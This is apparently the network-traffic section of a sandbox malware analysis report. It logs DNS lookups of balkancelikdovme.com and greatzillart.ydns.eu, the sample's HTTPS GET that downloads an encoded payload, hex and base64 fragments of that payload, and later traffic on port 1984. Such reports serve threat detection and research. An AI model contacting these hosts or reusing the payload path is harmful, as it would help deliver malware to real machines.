Aug 23, 2023 19:31:32.243730068 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.243751049 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.244074106 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.244100094 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.245044947 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.246026039 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.247036934 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.270919085 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.277417898 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.277461052 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.277585030 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.277617931 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.277884007 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.277909994 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.278078079 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.278115034 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.278217077 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.278247118 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.278542995 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.279032946 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.279047966 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.280014992 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.280277967 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.281023026 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.282011986 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.282035112 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.283056974 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.283073902 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.284018993 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.285016060 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.285028934 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.285092115 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.285099983 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.285145044 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.285191059 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.285196066 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.285238981 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.285281897 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.285331011 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.310094118 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.310131073 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.310395002 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.310422897 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.310442924 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.313669920 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.313707113 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.313951015 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.313968897 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.314030886 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.314059019 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.315009117 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.316003084 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.316067934 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.316095114 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.316298962 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.316344023 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.316567898 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.316593885 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.316831112 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.316857100 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.317004919 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.317023039 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.317852020 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.318022966 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.318118095 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.319031954 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.319149971 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.320007086 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.321011066 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.321032047 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.322017908 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.322041988 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.323028088 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.323045969 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.323182106 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.323189974 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.323220968 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.323259115 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.323262930 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.323296070 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.323324919 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.323357105 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.323386908 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.323421955 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.325800896 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.356384039 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.356427908 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.356534958 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.356563091 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.356647015 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.356671095 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.356745958 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.356772900 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.356848001 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.356894016 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.357203960 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358036041 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358059883 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358155012 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358302116 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358309984 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358349085 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358355045 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358407021 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358413935 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358464956 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358470917 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358511925 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358517885 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358561993 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358566046 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358606100 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358632088 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358650923 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358656883 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358690023 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358695984 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358732939 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358737946 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358767033 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358772039 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358781099 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358814001 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358819008 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358841896 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358848095 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358880997 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358886003 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358925104 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358930111 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358939886 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.358978987 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.358984947 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.359018087 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.359023094 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.359075069 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.359126091 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.359131098 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.359148026 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.359167099 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.359203100 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.359245062 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.359278917 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.359317064 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.359352112 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.359390020 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.420594931 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.420939922 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.457674026 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.457736015 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:32.457765102 CEST	49737	443	192.168.2.3	185.181.116.217
Aug 23, 2023 19:31:32.457773924 CEST	443	49737	185.181.116.217	192.168.2.3
Aug 23, 2023 19:31:52.241105080 CEST	49729	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:31:53.405697107 CEST	49746	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:31:53.432353020 CEST	1984	49746	185.216.71.113	192.168.2.3
Aug 23, 2023 19:31:53.432568073 CEST	49746	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:31:53.439621925 CEST	49746	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:31:53.577601910 CEST	1984	49746	185.216.71.113	192.168.2.3
Aug 23, 2023 19:32:04.010745049 CEST	1984	49746	185.216.71.113	192.168.2.3
Aug 23, 2023 19:32:04.054502964 CEST	49746	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:32:04.082494974 CEST	1984	49746	185.216.71.113	192.168.2.3
Aug 23, 2023 19:32:04.094211102 CEST	49746	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:32:04.171715975 CEST	1984	49746	185.216.71.113	192.168.2.3
Aug 23, 2023 19:32:04.172044992 CEST	49746	1984	192.168.2.3	185.216.71.113
Aug 23, 2023 19:32:04.285057068 CEST	1984	49746	185.216.71.113	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2023 19:30:31.757884979 CEST	51739	53	192.168.2.3	8.8.8.8
Aug 23, 2023 19:30:31.806010962 CEST	53	51739	8.8.8.8	192.168.2.3
Aug 23, 2023 19:30:47.700331926 CEST	63604	53	192.168.2.3	8.8.8.8
Aug 23, 2023 19:30:47.738593102 CEST	53	63604	8.8.8.8	192.168.2.3
Aug 23, 2023 19:31:17.156790972 CEST	61636	53	192.168.2.3	8.8.8.8
Aug 23, 2023 19:31:17.216872931 CEST	53	61636	8.8.8.8	192.168.2.3
Aug 23, 2023 19:31:31.365551949 CEST	59697	53	192.168.2.3	8.8.8.8
Aug 23, 2023 19:31:31.421535015 CEST	53	59697	8.8.8.8	192.168.2.3
Aug 23, 2023 19:31:53.274295092 CEST	53304	53	192.168.2.3	8.8.8.8
Aug 23, 2023 19:31:53.344924927 CEST	53	53304	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 23, 2023 19:30:31.757884979 CEST	192.168.2.3	8.8.8.8	0x4380	Standard query (0)	balkancelikdovme.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 19:30:47.700331926 CEST	192.168.2.3	8.8.8.8	0xdffd	Standard query (0)	greatzillart.ydns.eu	A (IP address)	IN (0x0001)	false
Aug 23, 2023 19:31:17.156790972 CEST	192.168.2.3	8.8.8.8	0xe46f	Standard query (0)	balkancelikdovme.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 19:31:31.365551949 CEST	192.168.2.3	8.8.8.8	0x2211	Standard query (0)	balkancelikdovme.com	A (IP address)	IN (0x0001)	false
Aug 23, 2023 19:31:53.274295092 CEST	192.168.2.3	8.8.8.8	0x14e2	Standard query (0)	greatzillart.ydns.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 23, 2023 19:30:31.806010962 CEST	8.8.8.8	192.168.2.3	0x4380	No error (0)	balkancelikdovme.com	185.181.116.217	A (IP address)	IN (0x0001)	false
Aug 23, 2023 19:30:47.738593102 CEST	8.8.8.8	192.168.2.3	0xdffd	No error (0)	greatzillart.ydns.eu	185.216.71.113	A (IP address)	IN (0x0001)	false
Aug 23, 2023 19:31:17.216872931 CEST	8.8.8.8	192.168.2.3	0xe46f	No error (0)	balkancelikdovme.com	185.181.116.217	A (IP address)	IN (0x0001)	false
Aug 23, 2023 19:31:31.421535015 CEST	8.8.8.8	192.168.2.3	0x2211	No error (0)	balkancelikdovme.com	185.181.116.217	A (IP address)	IN (0x0001)	false
Aug 23, 2023 19:31:53.344924927 CEST	8.8.8.8	192.168.2.3	0x14e2	No error (0)	greatzillart.ydns.eu	185.216.71.113	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

balkancelikdovme.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49727	185.181.116.217	443	C:\Users\user\Desktop\0vJrK0NCd1.exe

Timestamp	kBytes transferred	Direction	Data
2023-08-23 17:30:33 UTC	0	OUT	GET /work/Elpuxpkilck HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: balkancelikdovme.com
2023-08-23 17:30:33 UTC	0	IN	HTTP/1.1 200 OK Connection: close last-modified: Tue, 22 Aug 2023 08:42:22 GMT accept-ranges: bytes content-length: 1036168 date: Wed, 23 Aug 2023 17:30:33 GMT vary: User-Agent alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-08-23 17:30:33 UTC	0	IN	Data Raw: 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 45 56 6c 68 46 52 45 4a 68 4c 43 67 6b 4a 44 45 39 4f 43 77 7a 4e 44 6b 6d 4f 79 6f 32 4a 44 4d 36 4a 7a 45 6c 50 44 73 76 4c 54 67 36 4f 53 6b 6b 4f 44 67 32 4a 43 34 77 4a 44 49 6f 4b 7a 4d 79 4b 79 77 6c 4c 44 59 6e 4f 44 6b 30 4e 69 30 72 4a 53 51 73 4a 6a 30 33 50 54 59 78 4e 79 67 6f 4f 7a 63 32 4e 43 30 6e 50 53 77 34 4c 54 63 73 4d 30 74 4a 53 6b 5a 68 56 68 77 58 51 6d 46 45 61 43 49 69 46 32 46 45 52 55 59 68 52 30 74 4a 53 69 49 69 52 47 46 46 52 46 5a 59 52 55 52 43 59 57 59 76 4d 7a 67 37 4d 79 34 73 4c 79 59 75 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 Data Ascii: S0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUVEVlhFREJhLCgkJDE9OCwzNDkmOyo2JDM6JzElPDsvLTg6OSkkODg2JC4wJDIoKzMyKywlLDYnODk0Ni0rJSQsJj03PTYxNygoOzc2NC0nPSw4LTcsM0tJSkZhVhwXQmFEaCIiF2FERUYhR0tJSiIiRGFFRFZYRURCYWYvMzg7My4sLyYuS0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUV
2023-08-23 17:30:33 UTC	1	IN	Data Raw: 78 6c 4e 58 6a 6c 77 34 2b 68 4b 39 38 39 72 64 79 50 64 68 47 78 44 4e 75 57 53 7a 59 68 73 56 31 30 52 51 4c 68 72 42 75 42 5a 65 57 31 6e 49 4d 6d 4e 6a 75 2b 79 47 51 59 56 44 2f 51 30 4e 66 71 31 46 77 52 31 7a 45 4a 42 6a 74 78 56 69 53 48 55 69 32 51 46 79 62 47 41 62 7a 33 34 57 74 53 46 4c 41 33 38 55 57 53 35 61 77 6b 35 4b 4c 2f 70 2b 62 35 47 30 7a 68 73 55 75 74 65 4b 65 6b 32 7a 2f 56 50 71 79 62 39 63 4b 78 59 65 2f 39 55 63 38 43 4a 46 4b 46 37 49 54 59 66 45 50 75 4b 31 75 31 4a 52 50 2f 74 69 58 57 42 49 4c 6c 6f 55 52 49 41 47 77 58 55 4c 76 41 53 7a 64 57 72 76 78 6c 4b 34 2f 62 72 36 74 77 4e 32 46 45 73 57 53 77 6a 50 62 73 6f 70 2b 32 58 51 61 30 73 38 41 32 4e 44 55 38 6b 72 46 6d 76 44 78 59 42 31 53 50 72 2b 51 72 77 44 7a 65 76 Data Ascii: xlNXjlw4+hK989rdyPdhGxDNuWSzYhsV10RQLhrBuBZeW1nIMmNju+yGQYVD/Q0Nfq1FwR1zEJBjtxViSHUi2QFybGAbz34WtSFLA38UWS5awk5KL/p+b5G0zhsUuteKek2z/VPqyb9cKxYe/9Uc8CJFKF7ITYfEPuK1u1JRP/tiXWBILloURIAGwXULvASzdWrvxlK4/br6twN2FEsWSwjPbsop+2XQa0s8A2NDU8krFmvDxYB1SPr+QrwDzev
2023-08-23 17:30:33 UTC	16	IN	Data Raw: 5a 6b 4b 6e 41 32 45 48 45 4d 51 50 55 39 44 55 42 5a 50 6c 6b 2b 46 54 6b 57 4a 79 51 6b 63 54 30 37 4e 6a 41 30 4d 79 6c 66 4a 45 67 70 54 44 71 79 4b 72 38 6c 74 44 72 47 50 64 38 38 32 7a 33 6b 50 64 73 31 67 6b 42 35 4b 58 30 6d 69 43 69 6b 4c 71 4d 6a 72 43 61 6b 4f 70 59 30 71 43 34 59 50 47 77 6e 39 6a 67 50 4b 51 59 6a 2b 54 74 65 4e 56 73 35 55 79 5a 71 50 6d 4d 30 50 43 4e 42 4b 53 77 6c 4f 6a 78 57 4e 45 51 39 54 79 79 34 4c 4c 59 39 78 7a 54 41 4c 39 4d 71 33 45 48 57 4d 64 55 6b 6b 43 4f 43 4a 33 30 30 66 54 69 77 4d 5a 4a 41 61 79 67 43 4f 67 6b 32 4d 7a 68 61 4a 62 4d 2b 75 69 2f 68 50 4e 73 6a 65 43 61 4c 4e 35 49 6a 6d 7a 65 68 4f 78 59 39 42 45 44 2b 50 51 42 78 7a 30 46 52 4e 6c 34 78 78 79 37 6b 4d 2b 41 38 65 7a 36 66 4c 36 59 75 44 Data Ascii: ZkKnA2EHEMQPU9DUBZPlk+FTkWJyQkcT07NjA0MylfJEgpTDqyKr8ltDrGPd882z3kPds1gkB5KX0miCikLqMjrCakOpY0qC4YPGwn9jgPKQYj+TteNVs5UyZqPmM0PCNBKSwlOjxWNEQ9Tyy4LLY9xzTAL9Mq3EHWMdUkkCOCJ300fTiwMZJAaygCOgk2MzhaJbM+ui/hPNsjeCaLN5IjmzehOxY9BED+PQBxz0FRNl4xxy7kM+A8ez6fL6YuD
2023-08-23 17:30:33 UTC	32	IN	Data Raw: 62 47 75 73 6d 38 78 72 2f 47 7a 63 37 4f 78 62 61 36 78 72 2f 42 76 64 47 33 79 38 44 50 76 37 76 4c 78 4e 47 35 74 38 4c 4a 76 62 79 38 7a 64 47 36 75 38 44 52 79 4d 50 4f 77 38 72 48 76 38 50 48 78 74 48 4a 77 4d 75 36 75 72 37 41 79 63 6a 52 7a 73 62 50 75 62 71 35 76 38 57 36 79 73 32 33 75 73 44 42 79 63 71 35 79 62 72 43 75 38 6d 2f 52 4d 72 52 77 6d 6d 30 76 54 36 6f 54 37 6f 7a 6f 6b 69 2f 7a 53 71 39 7a 4d 56 4d 74 72 6a 44 54 72 71 37 76 44 4c 4f 76 62 63 6b 79 4d 64 45 61 73 76 4e 51 78 7a 4e 79 4d 5a 50 78 72 38 69 68 2b 48 42 77 4b 54 49 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 74 37 76 41 76 73 6e 4c 75 63 61 36 79 62 76 47 76 38 62 4b 7a 73 37 46 75 62 72 4a 76 35 75 36 7a 33 43 4d 76 39 47 2b 76 63 72 43 30 62 61 33 78 4d 6d 36 76 Data Ascii: bGusm8xr/Gzc7Oxba6xr/BvdG3y8DPv7vLxNG5t8LJvby8zdG6u8DRyMPOw8rHv8PHxtHJwMu6ur7AycjRzsbPubq5v8W6ys23usDBycq5ybrCu8m/RMrRwmm0vT6oT7ozoki/zSq9zMVMtrjDTrq7vDLOvbckyMdEasvNQxzNyMZPxr8ih+HBwKTI0c7G0Lm7ucDFu8rKt7vAvsnLuca6ybvGv8bKzs7FubrJv5u6z3CMv9G+vcrC0ba3xMm6v
2023-08-23 17:30:33 UTC	48	IN	Data Raw: 37 45 30 59 65 2f 78 4d 53 47 30 63 61 37 69 37 71 39 76 59 44 4a 78 38 71 4f 78 74 43 79 65 37 6e 41 78 6e 76 4b 79 73 44 62 77 4c 34 58 7a 62 6e 47 74 65 6d 37 78 72 6a 6d 79 73 35 67 76 62 6d 36 79 63 43 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 70 6e 7a 70 79 32 76 63 61 6d 77 62 72 51 72 73 75 2f 7a 71 61 37 7a 4d 57 59 75 62 6a 44 6f 4c 32 37 76 5a 54 52 76 62 71 70 30 63 66 43 6c 38 50 4e 78 36 62 44 79 4d 61 59 79 52 66 4c 6f 37 71 2b 77 4d 6e 48 30 63 37 47 30 4c 6d 37 75 63 44 46 75 38 72 4b 75 4c 74 73 31 Data Ascii: 7E0Ye/xMSG0ca7i7q9vYDJx8qOxtCye7nAxnvKysDbwL4XzbnGtem7xrjmys5gvbm6ycC+vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xspnzpy2vcamwbrQrsu/zqa7zMWYubjDoL27vZTRvbqp0cfCl8PNx6bDyMaYyRfLo7q+wMnH0c7G0Lm7ucDFu8rKuLts1
2023-08-23 17:30:33 UTC	64	IN	Data Raw: 62 4b 7a 73 37 46 75 62 72 47 76 37 36 39 30 4c 66 4d 77 4d 36 2f 76 4d 76 46 30 62 61 33 77 38 6d 36 76 4c 33 4e 7a 72 71 36 77 4d 37 49 77 73 37 45 79 73 65 2f 78 4d 66 47 30 63 62 41 79 37 71 39 76 73 44 4a 78 39 48 4f 78 74 43 35 75 37 6e 41 78 62 76 4b 79 72 65 37 77 4c 37 4a 79 37 6e 47 75 73 6d 37 78 72 2f 47 79 73 37 4f 78 62 6d 36 78 72 2b 2b 76 64 43 33 7a 4d 44 4f 76 37 7a 4c 78 64 47 32 74 38 50 4a 75 72 79 39 7a 63 36 36 75 73 44 4f 79 4d 4c 4f 78 4d 72 48 76 38 54 48 78 74 48 47 77 4d 75 36 76 62 37 41 79 63 66 52 7a 73 62 51 75 62 75 35 77 4d 57 37 79 73 71 33 75 38 43 2b 79 63 75 35 78 72 72 4a 75 38 61 2f 78 73 72 4f 7a 73 57 35 75 73 61 2f 76 72 33 51 74 38 7a 41 7a 72 2b 38 79 38 58 52 74 72 66 44 79 62 71 38 76 63 33 4f 75 72 72 41 7a Data Ascii: bKzs7FubrGv7690LfMwM6/vMvF0ba3w8m6vL3Nzrq6wM7Iws7Eyse/xMfG0cbAy7q9vsDJx9HOxtC5u7nAxbvKyre7wL7Jy7nGusm7xr/Gys7Oxbm6xr++vdC3zMDOv7zLxdG2t8PJury9zc66usDOyMLOxMrHv8THxtHGwMu6vb7AycfRzsbQubu5wMW7ysq3u8C+ycu5xrrJu8a/xsrOzsW5usa/vr3Qt8zAzr+8y8XRtrfDybq8vc3OurrAz
